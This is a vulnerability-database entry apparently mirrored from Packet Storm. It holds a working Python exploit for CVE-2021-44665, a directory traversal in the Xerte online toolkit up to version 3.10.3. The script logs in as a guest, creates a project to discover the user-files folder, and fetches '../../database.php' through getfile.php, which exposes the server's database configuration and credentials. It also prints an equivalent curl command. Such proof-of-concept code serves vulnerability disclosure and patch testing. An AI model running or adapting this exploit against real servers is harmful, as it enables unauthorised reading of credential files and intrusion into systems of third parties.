Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRik LutzPACKETSTORM:166181
HistoryMar 02, 2022 - 12:00 a.m.

Xerte 3.10.3 Directory Traversal

2022-03-0200:00:00
Rik Lutz
packetstormsecurity.com
223
JSON
`# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)  
# Date: 05/03/2021  
# Exploit Author: Rik Lutz  
# Vendor Homepage: https://xerte.org.uk  
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip  
# Version: up until 3.10.3  
# Tested on: Windows 10 XAMP  
# CVE : CVE-2021-44665  
  
# This PoC assumes guest login is enabled. Vulnerable url:  
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php  
# You can find a userfiles-directory by creating a project and browsing the media menu.  
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download  
# The userfiles-direcotry will be noted in the URL and/or when you download a file.  
# They look like: <numbers>-<username>-<templatename>  
  
import requests  
import re  
  
xerte_base_url = "http://127.0.0.1"  
file_to_grab = "/../../database.php"  
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.  
  
with requests.Session() as session:  
# Get a PHP session ID  
if not php_session_id:  
session.get(xerte_base_url)   
else:  
session.cookies.set("PHPSESSID", php_session_id)  
  
# Use a default template  
data = {  
'tutorialid': 'Nottingham',  
'templatename': 'Nottingham',  
'tutorialname': 'exploit',  
'folder_id': ''  
}  
  
# Create a new project in order to create a user-folder  
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)  
  
# Find template ID  
data = {  
'template_id': re.findall('(\d+)', template_id.text)[0]  
}  
  
# Find the created user-direcotry:  
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)  
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]  
  
# Grab file  
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)  
print(result.text)  
print("|-- Used Variables: --|")  
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])  
print("user direcotry: " + user_direcotry)  
print("Curl example:")  
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)  
  
  
`

Related

osv 1
zdt 1
cnvd 1
prion 1
cve 1
exploitdb 1
osv
osv
CVE-2021-44665
2022-02-24 21:15:07
zdt
zdt
Xerte 3.10.3 - Directory Traversal (Authenticated) Exploit
2022-03-02 00:00:00
cnvd
cnvd
Xerte path traversal vulnerability
2022-02-25 00:00:00
prion
prion
Directory traversal
2022-02-24 21:15:00
cve
cve
CVE-2021-44665
2022-02-24 21:15:00
exploitdb
exploitdb
Xerte 3.10.3 - Directory Traversal (Authenticated)
2022-03-02 00:00:00
JSON
Related for PACKETSTORM:166181
osv1zdt1cnvd1prion1cve1exploitdb1